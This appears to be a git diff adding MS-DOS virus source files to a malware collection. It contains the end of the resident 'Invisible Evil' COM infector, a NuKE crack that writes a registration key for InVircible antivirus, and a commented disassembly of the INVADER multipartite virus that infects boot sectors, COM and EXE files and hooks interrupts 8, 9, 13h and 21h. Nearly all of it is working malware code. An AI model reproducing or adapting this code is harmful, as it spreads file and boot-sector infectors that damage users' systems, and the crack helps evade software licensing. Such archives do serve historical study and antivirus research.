+ push cx
+ push dx
+ push di
+ push si
+ push ds
+ push es
+
+infect:
+ mov ax,3d02h ; Open the file being
+ int 21h ; executed do that!
+ jc fuckitall ; If error, get the fuck
+ ; out!
+
+ xchg ax,bx ; or.. mov bx,ax
+
+ push ds ; pusha
+ push cs ; push
+ pop ds ; pop!
+
+ mov ah,3fh ; Read from file
+ mov dx,(buffer-vstart) ; put in our buffer
+ mov cx,5h ; how much to read
+ int 21h ; do that
+ jc fuckitall ; If error, fuck it!
+
+
+ cmp word ptr cs:[(buffer-vstart)],5A4Dh ; Is it an .EXE?
+ je fuckitall ; If so, outa here..
+
+ cmp word ptr cs:[(buffer-vstart)],4D5Ah ; The other form?
+ je fuckitall ; (can be MZ or ZM)
+ ; If so, outa here
+ cmp word ptr cs:[(buffer-vstart)+3],9090h ; Ok, is it
+ je fuckitall ; infect? If so,
+ ; outa here
+ jmp next ; Move on..
+
+fuckitall:
+ jmp homey2 ; Something screwed,
+ ; outa dis thang..
+next:
+
+ mov ax,5700h ; Get date/time
+ int 21h ; int me baaaabe!
+
+ mov word ptr cs:[(old_time-vstart)],cx ; save time
+ mov word ptr cs:[(old_date-vstart)],dx ; save date
+
+ mov ax,4202h ; ftpr to end
+ mov cx,0 ; get ftpr (filesize)
+ cwd ; or.. xor dx,dx
+ int 21h
+ jc fuckitall ; if error, fuck it!
+ mov cx,ax ; mov cx to ax
+ sub cx,3 ; for the jmp
+ jmp save_rest_of_len
+ db ' [INVISIBLE EVIL!] (c) Metal Militia/Immortal Riot '
+
+save_rest_of_len:
+ mov word ptr cs:[(jump_add+1-vstart)],cx ; save jmp length
+
+ mov ah,40h ; write to file
+ mov cx,(vend-vstart) ; the virus
+ cwd ; from start
+ int 21h ; atlast the fun part
+ jnc fpointer ; no error(s), go on
+ jc homey ; fuck it!
+
+fpointer:
+ mov ax,4200h ; move file pointer
+ mov cx,0 ; to the beginning
+ cwd
+ int 21h
+
+
+ mov ah,40h ; write the JMP the
+ mov cx, 5 ; the file (5 bytes)
+ mov dx,(jump_add-vstart) ; offset jump thang
+ int 21h
+
+ jc homey ; if error, fuck it!
+
+ mov ax,5701h ; restore old
+ mov word ptr cx,cs:[(old_time-vstart)] ; date/time
+ mov word ptr dx,cs:[(old_date-vstart)]
+
+ and cl,0e0H ; chance the file's
+ inc cl ; seconds to "2" for
+ int 21h ; stealth "marker"
+
+
+ mov ah,3eh ; close thisone
+ int 21h
+
+
+homey: jmp homey2 ; outa here
+ db ' Dedicated to all the victims.. ' ; dedication note
+
+homey2: pop ds ; pop
+ pop es ; pop
+ pop ds ; pop
+ pop si ; pop
+ pop di ; pop
+ pop dx ; pop
+ pop cx ; pop
+ pop bx ; pop
+ pop ax ; new virus-name
+ ; popcorn virus?
+ jmp dword ptr cs:[(old_21-vstart)] ; heading for old
+ ; int21
+old_date dw 0 ; date/time
+old_time dw 0 ; saving place
+
+
+buffer: db 0cdh,20h,00 ; our lil' buffer
+buffer2 db 0,0 ; plus these two
+jump_add: db 0E9h,00,00,90h,90h; ; what we put instead
+ ; of org. jmp
+exit2: jmp exit ; get outa here
+
+load: mov ax,3030h ; Are we already in
+ int 21h ; this users memory
+ cmp bx,3030h ; well, check it!
+ je exit2 ; if so, outa here
+
+
+dec_here:
+ push cs ; push
+ pop ds ; pop
+
+ mov ah,4ah ; req. very much mem
+ mov bx,0ffffh ; ret's largest size
+ int 21h
+
+ mov ah,4ah ; ok, so now we
+ sub bx,(vend-vstart+15)/16+1 ; subtract the size of
+ jnc intme ; of our virus. If no
+ jmp exit2 ; error go on, else
+ ; fuck it
+intme:
+ int 21h ; int me! int me!
+
+ mov ah,48h
+ mov bx,(vend-vstart+15)/16 ; req. last pages
+ int 21h ; allocate to the virus
+ jnc decme ; no error, go on
+ jmp exit2 ; les get outa dis place
+
+decme:
+ dec ax ; oh? a dec, no push/pop
+ ; how glad i am :)
+ push es ; blurk! yet another push
+
+ mov es,ax ; set es to ax
+ jmp dos_own ; carry on comrade
+ db ' Greets to B-real!/IR ' ; greetings to our
+ ; latest member, a
+dos_own: ; friend of mine
+ mov byte ptr es:[0],'Z' ; this memory will
+ mov word ptr es:[1],8 ; have DOS as it's
+ ; owner
+ inc ax ; opposite of dec, eh?
+ ; yet another new-commer
+ lea si,[bp+offset vstart] ; copy to memory
+ mov di,0 ; (new block) xor di,di
+ jmp copy_rest ; go on
+ db ' It''s like this and like that and like thisena ' ; lil'
+
+copy_rest:
+ mov es,ax ; es as ax
+ mov cx,(vend-vstart+5)/2 ; the whole thing
+ cld ; bytes, clr direction
+ rep movsw
+ jmp make_res ; now, make it resident
+ db ' It''s like that and like this and like thatena '; thang
+
+make_res:
+ xor ax,ax ; atlast!
+ mov ds,ax ; put all shit to memory
+ push ds ; don't push me around :)
+ lds ax,ds:[21h*4] ; vectorswapping
+ jmp swap_sect ; (manually!)
+ db ' It''s like this.. ' ; by Snoop 'n Dre.
+
+swap_sect:
+ mov word ptr es:[old_21-vstart],ax ; where's our old int21
+ mov word ptr es:[old_21-vstart+2],ds ; stored? well see here
+ pop ds
+ mov word ptr ds:[21h*4],(new_21-vstart) ; point to our virus
+ mov ds:[21h*4+2],es ; instead of old21
+
+ push cs ; no cmt.
+ pop ds ; to much 'bout 'em
+ ; today, eh? :)
+
+exit:
+ push cs ; no cmt.
+ pop es ; see above
+
+ mov cx,5 ; five bytes
+ jmp copyback ; keep on moving..
+ db ' Love to Lisa! ' ; To the girl i love
+copyback:
+ mov si,offset buffer ; copy back org. jmp
+ add si,bp ; and run the org. proggy
+ jmp movdi_it ; yeah, les do that
+ db ' All i ever wanted.. ' ; Lisa, the one and only
+
+movdi_it:
+ mov di,100h ; di = 100h
+ repne movsb
+ jmp lastshit ; atlast, soon the end
+ db ' All i ever asked for.. ' ; Love in eternality!
+
+lastshit:
+ mov bp,100h ; bp equ 100h
+ jmp bp ; jmp to bp (SOF)
+
+
+vend equ $ ; end of virus
+
+virus ends
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm b/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm
new file mode 100644
index 00000000..5ea1211c
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm
@@ -0,0 +1,86 @@
+;
+; InVircible v6.02 Registrator, (c)1995 ûirogen
+;
+; This little utility simply installs InVircible's registration key onto
+; your hard drive. It is located on the last sector of the first cylinder
+; and is designated by the word 48A5h residing at the end of the sector.
+; After installing this, all current and future copies of InVircible installed
+; on that hard drive will be registered, or licenced rather.
+;
+
+segment cseg
+ assume cs: cseg, ds: cseg, es: cseg, ss: cseg
+
+cr equ 0ah
+lf equ 0dh
+
+org 100h
+start:
+ lea dx,intro ; display intro / prompt
+ call disp
+get_y_n:
+ mov ah,8 ; make sure the user wants to
+ int 21h
+ cmp al,'Y'
+ jz yes
+ cmp al,'y'
+ jz yes
+ cmp al,'N'
+ jz no
+ cmp al,'n'
+ jz no
+ jmp get_y_n
+yes:
+ call disp_al
+ mov dh,1
+ mov cx,1
+ call read_sec ; read boot sector
+ mov dh,0
+ mov cx,word ptr sec_buf[18h] ; get cylinder per sector
+ call read_sec ; read last sector of cyl 0
+ mov word ptr sec_buf[1FEh],0A548h ; throw word
+ mov ax,0301h ; write new sector to disk
+ int 13h
+ lea dx,done_msg
+ jmp exit
+no:
+ call disp_al
+ lea dx,abort_msg
+exit:
+ call disp
+ ret
+
+
+read_sec:
+ mov ax,0201h
+ lea bx,sec_buf
+ mov dl,80h
+ int 13h
+
+ ret
+disp:
+ mov ah,9
+ int 21h
+ ret
+
+disp_al:
+ mov dl,al
+ mov ah,2
+ int 21h
+ ret
+
+intro:
+ db cr,lf,' ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿'
+ db cr,lf,' ³ InVircible v6.02 Registrator, (c)1995 ûirogen [NuKE] ³'
+ db cr,lf,' ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij'
+ db cr,lf,' ³ Please distribute all over the known universe ³'
+ db cr,lf,' ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ'
+ db cr,lf,' WARNING: This software is about to make changes to the last sector'
+ db cr,lf,' of cylinfer 0, head 0 of your hard drive. It is unlikely that any'
+ db cr,lf,' problems will arise, but be cautious.'
+ db cr,lf,' Do you wish to continue [Y/N]? $'
+done_msg db cr,lf,cr,lf, ' InVircible Registrator Complete!$'
+abort_msg db cr,lf,cr,lf, ' InVircible Registrator Aborted By User!$'
+sec_buf:
+cseg ends
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.invdanub.asm b/MSDOS/Virus.MSDOS.Unknown.invdanub.asm
new file mode 100644
index 00000000..799c8763
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.invdanub.asm
@@ -0,0 +1,1196 @@
+;---------------------------------------------------------------------
+; virus INVADER ziskan 21. 8. 1991 z knihvny (Baran)
+; Jedna se o kombinovany virus napadajici BOOT sektor a .COM a .EXE
+; soubory. Inspiraci pro EXE cast viru je JERUSALEM B virus.
+;---------------------------------------------------------------------
+AX=0000 BX=0000 CX=1064 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
+DS=48C5 ES=48C5 SS=48C5 CS=48C5 IP=0100 NV UP EI PL NZ NA PO NC
+-10:0100 E92E0B JMP 0C31
+
+0000 E9 2E 0B 01 00 F5 54 61-28 99 05 00 00 00 14 17 i....uTa(.......
+0010 E0 41 90 19 64 00 C5 48-00 00 03 00 B8 00 50 01 `A..d.EH....8.P.
+0020 8F 20 20 20 20 20 20 20-20 20 20 20 20 20 90 19 . ..
+0030 20 20 20 20 20 20 20 20-01 00 34 0E 60 61 00 01 ..4.`a..
+0040 20 20 F5 68 50 0D 41 00-00 25 01 00 00 00 00 01 uhP.A..%......
+0050 50 41 43 41 44 2E 45 58-45 43 4F 4D 4D 41 4E 44 PACAD.EXECOMMAND
+0060 2E 43 4F 4D 2E 43 4F 4D-2E 45 58 45 10 00 00 02 .COM.COM.EXE....
+0070 00 00 80 00 30 BD 5C 00-30 BD 6C 00 30 BD 62 79 ....0=\.0=l.0=by
+0080 20 49 6E 76 61 64 65 72-2C 20 46 65 6E 67 20 43 Invader, Feng C
+0090 68 69 61 20 55 2E 2C 20-57 61 72 6E 69 6E 67 3A hia U., Warning:
+00A0 20 44 6F 6E 27 74 20 72-75 6E 20 41 43 41 44 2E Don't run ACAD.
+00B0 45 58 45 21 D8 0F 8E 0C-90 0A 90 0A 24 00 48 05 EXE!X.......$.H.
+00C0 24 00 48 05 24 00 47 06-24 00 47 06 24 00 D8 0F $.H.$.G.$.G.$.X.
+00D0 D8 0F 8E 0C 90 0A 90 0A-24 00 48 05 24 00 48 05 X.......$.H.$.H.
+00E0 24 00 ED 05 24 00 ED 05-24 00 C1 10 C1 10 1D 0E $.m.$.m.$.A.A...
+00F0 69 09 69 09 24 00 B4 04-24 00 B4 04 24 00 ED 05 i.i.$.4.$.4.$.m.
+;=====================================================================
+; Obsluha preruseni 8H
+;
+02B3 INT 3
+ CMP Byte Ptr CS:[003F],01
+ JZ 02DD
+ PUSH AX
+ MOV AX,CS:[003A]
+ CMP CS:[0003],AX
+ JA 02CD
+ INC Word Ptr CS:[0003]
+02CD PUSH CX
+ MOV CX,CS:[0003]
+02D3 NOP
+ LOOP 02D3
+ POP CX
+ POP AX
+02D8 JMP 0DD5:00AB
+02DD INC Word Ptr CS:[0003]
+ CMP Word Ptr CS:[0003],8000
+ JA 02ED
+ JMP 02D8
+02ED PUSH DS
+ PUSH AX
+ PUSH BX
+ PUSH CS
+ POP DS
+ CMP Byte Ptr [0048],01
+ JNZ 02FC
+ JMP 0332
+ NOP
+02FC MOV BX,[004B]
+ DEC Byte Ptr [004A]
+ JNZ 036D
+ IN AL,61
+ AND AL,FE
+ OUT 61,AL
+ MOV BX,[004B]
+ INC Word Ptr [004B]
+ CMP BX,0096
+ JNZ 031D
+ JMP 0352
+ NOP
+031D MOV AL,[BX+01E0]
+ MOV [004A],AL
+ SHL BX,1
+ MOV AX,[BX+00B4]
+ CMP AX,0000
+ JZ 0332
+ JMP 033B
+0332 IN AL,61
+ AND AL,FE
+ OUT 61,AL
+ JMP 036D
+ NOP
+033B MOV BX,AX
+ MOV AL,B6
+ OUT 43,AL
+ MOV AX,BX
+ OUT 42,AL
+ MOV AL,AH
+ OUT 42,AL
+ IN AL,61
+ OR AL,03
+ OUT 61,AL
+ JMP 036D
+0352 IN AL,61
+ AND AL,FE
+ OUT 61,AL
+ MOV Word Ptr [004B],0000
+ MOV Byte Ptr [004A],01
+ MOV AX,8000
+ AND AH,[0005]
+ MOV [0003],AX
+036D POP BX
+ POP AX
+ POP DS
+0370 JMP 02D8
+
+;=====================================================================
+; Obsluha preruseni 9H
+;
+0373 CLI
+ PUSH AX
+ PUSH DS
+ XOR AX,AX
+ MOV DS,AX
+ MOV AL,[0417]
+ POP DS ; rozpoznani CTRL ALT DEL
+ AND AL,0C
+ CMP AL,0C ; Je CTRL -ALT
+ JNZ 03B8
+ IN AL,60
+ AND AL,7F
+ CMP AL,53 ; Je DEL
+ JNZ 03B8
+ MOV AX,CS:[0003]
+ MOV AH,[0049]
+ MOV CL,05
+ CMP Byte Ptr CS:[003F],01
+ JNZ 03AB
+ MOV CL,04
+ Word Ptr CS:[0003],8000
+ JB 03AB
+ MOV CL,01
+03AB SHR AH,CL
+ CMP AL,AH
+ JA 03B8
+03B1 MOV AL,20
+ OUT 20,AL
+ JMP 03BE
+03B8 POP AX
+03B9 JMP 0DD5:0125
+03BE PUSH CS
+ .
+ . OBSLUHA CTRL ALT DEL + pomocne procedury
+ .
+;==========================================================
+;
+;
+04C1 DB 0
+04C2 DW ?
+;
+;----------------------------------------------------------
+; Cteni s RESETEM a opakovanim.
+; +04C4 MOV Byte Ptr [04C1],00 + MOV [04C2],AX +04CC CALL 04E9 + AND AH,C3 + JZ 04E8 + MOV AH,00 ; RESET + CALL 04E9 ;------------------------------- + MOV AX,[04C2] + INC Byte Ptr [04C1] + CMP Byte Ptr [04C1],01 + JBE 04CC + STC +04E8 RET + +04E9 PUSHF ; Volani puvodni obsluhy + CALL FAR CS:[0634] ; preruseni 13H. + RET + +;===================================================================== +; Obsluha preruseni 13H +; +04F0 80FC02 CMP AH,02 ; operace cteni ? +04F3 751B JNZ 0510 +04F5 F6C280 TEST DL,80 +04F8 751A JNZ 0514 +04FA 80FA02 CMP DL,02 +04FD 7711 JA 0510 +04FF 83F902 CMP CX,+02 ; pro disketu 2 sektor, +0502 750C JNZ 0510 ; 0 stopa +0504 80FE00 CMP DH,00 ; 0 hlava +0507 7507 JNZ 0510 +0509 EB13 JMP 051E +050B 90 NOP + +050C DB 01, 00, 80, 01 + +0510 E92001 JMP 0633 ; KONEC + +513 DB 00 + +0614 80FE01 CMP DH,01 ; pro disk libovolny sektor +0517 75F7 JNZ 0510 ; 1 hlava +0519 80FD00 CMP CH,00 ; 0 stopa +051C 75F2 JNZ 0510 +051E 2E803E130502 CMP Byte Ptr CS:[0513],02 +0524 7407 JZ 052D +0526 2EFE061305 INC Byte Ptr CS:[0513] +052B EBE3 JMP 0510 +052D 2EC606130500 MOV Byte Ptr CS:[0513],00 +0533 2E803E480001 CMP Byte Ptr CS:[0048],01 +0539 74D5 JZ 0510 +053B 50 PUSH AX +053C 53 PUSH BX +053D 51 PUSH CX +053E 52 PUSH DX +053F 56 PUSH SI +0540 57 PUSH DI +0541 06 PUSH ES +0542 1E PUSH DS +0543 8CC8 MOV AX,CS +0545 8ED8 MOV DS,AX +0547 8EC0 MOV ES,AX +0549 88164D00 MOV [004D],DL +054D B400 MOV AH,00 +054F E897FF CALL 04E9 ; RESET ZARIZENI +0552 BB0010 MOV BX,1000 +0555 B80102 MOV AX,0201 +0558 B90100 MOV CX,0001 +055B B600 MOV DH,00 +055D E889FF CALL 04E9 ; NACTI BOOT SEKTOR +0560 7243 JB 05A5 +0562 F6C280 TEST DL,80 +0565 7405 JZ 056C +0567 E8CE00 CALL 0638 ; PRO PEVNY DISK BOOT SEKTOR +056A 7239 JB 05A5 ; AKTIVNI PARTITION +056C B8CB3C MOV AX,3CCB ; Je virus pritomny ? 
+056F 39473E CMP [BX+3E],AX +0572 7518 JNZ 058C +0574 8B4740 MOV AX,[BX+40] +0577 3DFEFF CMP AX,FFFE +057A 7429 JZ 05A5 +057C 2B4742 SUB AX,[BX+42] +057F 3D0400 CMP AX,0004 +0582 7508 JNZ 058C +0584 E8E300 CALL 066A +0587 7303 JNB 058C +0589 E99F00 JMP 062B +058C F6064D0080 TEST Byte Ptr [004D],80 +0591 7415 JZ 05A8 +0593 C6064F0007 MOV Byte Ptr [004F],07 ; kam ulozit virus +0598 C606500000 MOV Byte Ptr [0050],00 ; u pevneho disku +059D C6064E0000 MOV Byte Ptr [004E],00 +05A2 EB3F JMP 05E3 +05A4 90 NOP +05A5 E98300 JMP 062B +05A8 C6064F0001 MOV Byte Ptr [004F],01 ; kam ulozit virus +05AD C606500028 MOV Byte Ptr [0050],28 ; u diskety +05B2 8A4715 MOV AL,[BX+15] +05B5 3CFC CMP AL,FC +05B7 7305 JNB 05BE +05B9 C606500050 MOV Byte Ptr [0050],50 +05BE A05000 MOV AL,[0050] +05C1 BB8F02 MOV BX,028F +05C4 B90900 MOV CX,0009 +05C7 8807 MOV [BX],AL ; U diskety zaroven +05C9 83C304 ADD BX,+04 ; preformatuj nultou +05CC E2F9 LOOP 05C7 ; stopu. +05CE B80905 MOV AX,0509 +05D1 BB8F02 MOV BX,028F +05D4 C6064E0000 MOV Byte Ptr [004E],00 +05D9 C6064F0001 MOV Byte Ptr [004F],01 +05DE E8AD00 CALL 068E +05E1 7248 JB 062B + +05E3 BB0000 MOV BX,0000 ; Zapis virus. +05E6 A14F00 MOV AX,[004F] +05E9 A3440E MOV [0E44],AX +05EC A14D00 MOV AX,[004D] +05EF A3460E MOV [0E46],AX +05F2 B80903 MOV AX,0309 +05F5 E89600 CALL 068E ;----------------------- +05F8 7231 JB 062B +05FA C6064F0001 MOV Byte Ptr [004F],01 +05FF C606500000 MOV Byte Ptr [0050],00 +0604 F6C280 TEST DL,80 +0607 740C JZ 0615 +0609 A10C05 MOV AX,[050C] +060C A34F00 MOV [004F],AX +060F A10E05 MOV AX,[050E] +0612 A34D00 MOV [004D],AX +0615 BE0310 MOV SI,1003 +0618 BF030E MOV DI,0E03 +061B B92500 MOV CX,0025 +061E 90 NOP +061F FC CLD +0620 F3A4 REPZ MOVSB +0622 BB000E MOV BX,0E00 ; Zapis virus do BOOT sektoru. 
+0625 B80103 MOV AX,0301 +0628 E86300 CALL 068E +062B 1F POP DS +062C 07 POP ES +062D 5F POP DI +062E 5E POP SI +062F 5A POP DX +0630 59 POP CX +0631 5B POP BX +0632 58 POP AX +0633 EA88227000 JMP 0070:2288 + +;------------------------------------------------------------------ +; Pro pevny disk nalezeni aktivni PARTITION a nacteni BOOT sektoru. +; +0638 MOV SI,11BE + MOV BL,04 +063D CMP Byte Ptr [SI],80 + JZ 0650 + CMP Byte Ptr [SI],00 + JNZ 064E + ADD SI,+10 + DEC BL + JNZ 063D +064E STC + RET +0650 MOV AX,[SI] + MOV [050E],AX + MOV AX,[SI+02] + MOV [050C],AX + MOV DX,[SI] + MOV CX,[SI+02] + MOV AX,0201 + MOV BX,1000 + CALL 04C4 + RET + +066A 8B4740 MOV AX,[BX+40] +066D 33D2 XOR DX,DX +066F F77718 DIV Word Ptr [BX+18] +0672 FEC2 INC DL +0674 88164F00 MOV [004F],DL +0678 33D2 XOR DX,DX +067A F7771A DIV Word Ptr [BX+1A] +067D 88164E00 MOV [004E],DL +0681 A25000 MOV [0050],AL +0684 B80102 MOV AX,0201 +0687 BB0010 MOV BX,1000 +068A E80100 CALL 068E +068D C3 RET + +068E 8B0E4F00 MOV CX,[004F] +0692 8B164D00 MOV DX,[004D] +0696 E82BFE CALL 04C4 +0699 C3 RET + +;===================================================================== +; Obsluha preruseni 21H +; +069A 9C PUSHF +069B 3D4342 CMP AX,4243 ; test pritommnosti viru +069E 7505 JNZ 06A5 +06A0 B87856 MOV AX,5678 +06A3 9D POPF +06A4 CF IRET +06A5 3D4442 CMP AX,4244 +06A8 741F JZ 06C9 +06AA 3D004B CMP AX,4B00 ; EXEC +06AD 7503 JNZ 06B2 +06AF EB2E JMP 06DF +06B1 90 NOP +06B2 3D003D CMP AX,3D00 +06B5 750B JNZ 06C2 +06B7 2E803E3E0001 CMP Byte Ptr [003E],01 +06BD 7403 JZ 06C2 +06BF EB1E JMP 06DF +06C2 CC INT 3 +06C3 9D POPF +06C4 EA14021C10 JMP 101C:0214 +06C9 58 POP AX +06CA 58 POP AX +06CB 58 POP AX +06CC 2EA3DD06 MOV CS:[06DD],AX +06D0 F3A4 REPZ MOVSB +06D2 9D POPF +06D3 E87703 CALL 0A4D +06D6 8B0E1400 MOV CX,[0014] +06DA EA0001EE13 JMP 13EE:0100 +;==================================================================== +; obsluha sluzby EXEC +; +06DF 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF +06E6 2EC70638000000 MOV Word 
Ptr CS:[0038],0000 +06ED 2E89160600 MOV CS:[0006],DX +06F2 2E8C1E0800 MOV CS:[0008],DS +06F7 50 PUSH AX +06F8 53 PUSH BX +06F9 51 PUSH CX +06FA 52 PUSH DX +06FB 56 PUSH SI +06FC 57 PUSH DI +06FD 1E PUSH DS +06FE 06 PUSH ES +06FF FC CLD +0700 8BF2 MOV SI,DX +0702 8A04 MOV AL,[SI] ; konverze jmena na velka +0704 0AC0 OR AL,AL ; pismena. +0706 740E JZ 0716 +0708 3C61 CMP AL,61 ;'a' +070A 7207 JB 0713 +070C 3C7A CMP AL,7A ;'z' +070E 7703 JA 0713 +0710 802C20 SUB Byte Ptr [SI],20 ;' ' +0713 46 INC SI +0714 EBEC JMP 0702 +0716 2E89363C00 MOV CS:[003C],SI ; ukazatel za jmeno +071B 8BC6 MOV AX,SI +071D 0E PUSH CS +071E 07 POP ES +071F B90B00 MOV CX,000B +0722 2BF1 SUB SI,CX +0724 BF5900 MOV DI,0059 ; nenapadame COMMAND.COM +0727 F3A6 REPZ CMPSB +0729 7503 JNZ 072E +072B E9EA02 JMP 0A18 +072E 8BF0 MOV SI,AX +0730 B90800 MOV CX,0008 +0733 2BF1 SUB SI,CX +0735 BF5100 MOV DI,0051 +0738 F3A6 REPZ CMPSB ; a ACAD.EXE +073A 751F JNZ 075B +073C E81903 CALL 0A58 +073F 2E803E3F0001 CMP Byte Ptr CS:[003F],01 +0745 7409 JZ 0750 +0747 2E83063A001E ADD Word Ptr CS:[003A],+1E +074D EB08 JMP 0757 +074F 90 NOP +0750 2E810603000004 ADD Word Ptr CS:[0003],0400 +0757 F9 STC +0758 EB0D JMP 0767 +075A 90 NOP +075B B80043 MOV AX,4300 ; atributy souboru +075E CD21 INT 21 ;---------------------- +0760 7205 JB 0767 +0762 2E890E0C00 MOV CS:[000C],CX +0767 726F JB 07D8 +0769 32C0 XOR AL,AL +076B 2EA21B00 MOV CS:[001B],AL +076F 2E8B363C00 MOV SI,CS:[003C] +0774 B90400 MOV CX,0004 +0777 2BF1 SUB SI,CX +0779 BF6400 MOV DI,0064 ; porovname s .COM +077C F3A6 REPZ CMPSB +077E 741A JZ 079A +0780 2EFE061B00 INC Byte Ptr CS:[001B] +0785 2E8B363C00 MOV SI,CS:[003C] +078A B90400 MOV CX,0004 +078D 2BF1 SUB SI,CX +078F BF6800 MOV DI,0068 +0792 F3A6 REPZ CMPSB ; a .EXE +0794 7404 JZ 079A +0796 F9 STC +0797 EB3F JMP 07D8 +0799 90 NOP +079A 8BFA MOV DI,DX +079C 32D2 XOR DL,DL +079E 807D013A CMP Byte Ptr [DI+01],3A ;':' +07A2 7505 JNZ 07A9 +07A4 8A15 MOV DL,[DI] +07A6 80E21F AND DL,1F +07A9 B436 MOV AH,36 ; Zjisti 
volny prostor
+07AB CD21 INT 21 ; na disku.
+07AD 3DFFFF CMP AX,FFFF ;
+07B0 7503 JNZ 07B5 ;
+07B2 E96302 JMP 0A18 ;
+07B5 F7E3 MUL BX ;
+07B7 F7E1 MUL CX ;
+07B9 0BD2 OR DX,DX ;
+07BB 7505 JNZ 07C2 ;
+07BD 3D0010 CMP AX,1000 ;
+07C0 72F0 JB 07B2 ;----------------------
+07C2 2E8B160600 MOV DX,CS:[0006]
+07C7 B8003D MOV AX,3D00 ; otevri soubor
+07CA 2EC6063E0001 MOV Byte Ptr CS:[003E],01
+07D0 CD21 INT 21
+07D2 2EC6063E0000 MOV Byte Ptr CS:[003E],00
+07D8 7267 JB 0841
+07DA 2EA30A00 MOV CS:[000A],AX
+07DE 8BD8 MOV BX,AX
+07E0 B80242 MOV AX,4202 ; SEEK na konec - 5
+07E3 B9FFFF MOV CX,FFFF
+07E6 BAFBFF MOV DX,FFFB
+07E9 CD21 INT 21
+07EB 7254 JB 0841
+07ED 050500 ADD AX,0005
+07F0 2EA31400 MOV CS:[0014],AX
+07F4 B80042 MOV AX,4200
+07F7 B90000 MOV CX,0000 ; SEEK na zacatek + 12
+07FA BA1200 MOV DX,0012
+07FD CD21 INT 21
+07FF 7240 JB 0841
+0801 B90200 MOV CX,0002
+0804 BA3600 MOV DX,0036
+0807 8BFA MOV DI,DX
+0809 8CC8 MOV AX,CS
+080B 8ED8 MOV DS,AX
+080D 8EC0 MOV ES,AX
+080F B43F MOV AH,3F ; precteme 2 byte
+0811 CD21 INT 21
+0813 8B05 MOV AX,[DI]
+0815 3D9019 CMP AX,1990 ; Pokud jsou 1990, koncime.
+0818 7507 JNZ 0821
+081A B43E MOV AH,3E
+081C CD21 INT 21
+081E E9F701 JMP 0A18
+0821 B82435 MOV AX,3524 ; redefinice preruseni 24H
+0824 CD21 INT 21
+0826 891E230A MOV [0A23],BX
+082A 8C06250A MOV [0A25],ES
+082E BA270A MOV DX,0A27
+0831 B82425 MOV AX,2524
+0834 CD21 INT 21 ;--------------------------
+0836 C5160600 LDS DX,[0006]
+083A 33C9 XOR CX,CX
+083C B80143 MOV AX,4301 ; nastav atributy
+083F CD21 INT 21
+0841 723B JB 087E
+0843 2E8B1E0A00 MOV BX,CS:[000A]
+0848 B43E MOV AH,3E ; zavri soubor
+084A CD21 INT 21
+084C 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF
+0853 B8023D MOV AX,3D02 ; otevri v R/W modu
+0856 CD21 INT 21
+0858 7224 JB 087E
+085A 2EA30A00 MOV CS:[000A],AX
+085E 8CC8 MOV AX,CS
+0860 8ED8 MOV DS,AX
+0862 8EC0 MOV ES,AX
+0864 8B1E0A00 MOV BX,[000A]
+0868 B80057 MOV AX,5700 ; datum posledni modifikace
+086B CD21 INT 21
+086D 89160E00 MOV [000E],DX
+0871 890E1000 MOV [0010],CX
+0875 B80042 MOV AX,4200 ; seek na zacatek
+0878 33C9 XOR CX,CX
+087A 8BD1 MOV DX,CX
+087C CD21 INT 21
+087E 7255 JB 08D5
+0880 803E1B0000 CMP Byte Ptr [001B],00
+0885 7403 JZ 088A
+0887 EB6B JMP 08F4
+
+;---------------------------------------------------------------
+; OBSLUHA .COM souboru.
+;
+088A BB0010 MOV BX,1000
+088D B448 MOV AH,48
+088F CD21 INT 21
+0891 730B JNB 089E
+0893 B43E MOV AH,3E
+0895 8B1E0A00 MOV BX,[000A]
+0899 CD21 INT 21
+089B E97A01 JMP 0A18
+089E FF063800 INC Word Ptr [0038]
+08A2 8EC0 MOV ES,AX
+08A4 33F6 XOR SI,SI
+08A6 8BFE MOV DI,SI
+08A8 A10300 MOV AX,[0003]
+08AB 0C01 OR AL,01
+08AD A20500 MOV [0005],AL
+08B0 C606480001 MOV Byte Ptr [0048],01
+08B5 E87201 CALL 0A2A
+08B8 B90010 MOV CX,1000
+08BB F3A4 REPZ MOVSB
+08BD E86A01 CALL 0A2A
+08C0 C606480000 MOV Byte Ptr [0048],00
+08C5 8BD7 MOV DX,DI
+08C7 8B0E1400 MOV CX,[0014]
+08CB 8B1E0A00 MOV BX,[000A]
+08CF 06 PUSH ES
+08D0 1F POP DS
+08D1 B43F MOV AH,3F
+08D3 CD21 INT 21
+08D5 7215 JB 08EC
+08D7 03F9 ADD DI,CX
+08D9 7211 JB 08EC
+08DB 33C9 XOR CX,CX
+08DD 8BD1 MOV DX,CX
+08DF B80042 MOV AX,4200
+08E2 CD21 INT 21
+08E4 8BCF MOV CX,DI
+08E6 33D2 XOR DX,DX
+08E8 B440 MOV AH,40
+08EA CD21 INT 21
+08EC 7210 JB 08FE
+08EE E86701 CALL 0A58
+08F1 E9DF00 JMP 09D3
+
+;---------------------------------------------------------------
+; OBSLUHA .EXE souboru.
+;
+08F4 B91C00 MOV CX,001C ; nacteni .EXE headeru
+08F7 BA1C00 MOV DX,001C
+08FA B43F MOV AH,3F
+08FC CD21 INT 21
+08FE 7252 JB 0952
+0900 813E2E009019 CMP Word Ptr [002E],1990 ; kontrolni suma
+0906 744A JZ 0952
+0908 C7062E009019 MOV Word Ptr [002E],1990
+090E A12A00 MOV AX,[002A] ; SS
+0911 A34200 MOV [0042],AX
+0914 A12C00 MOV AX,[002C] ; SP
+0917 A34000 MOV [0040],AX
+091A A13000 MOV AX,[0030] ; IP
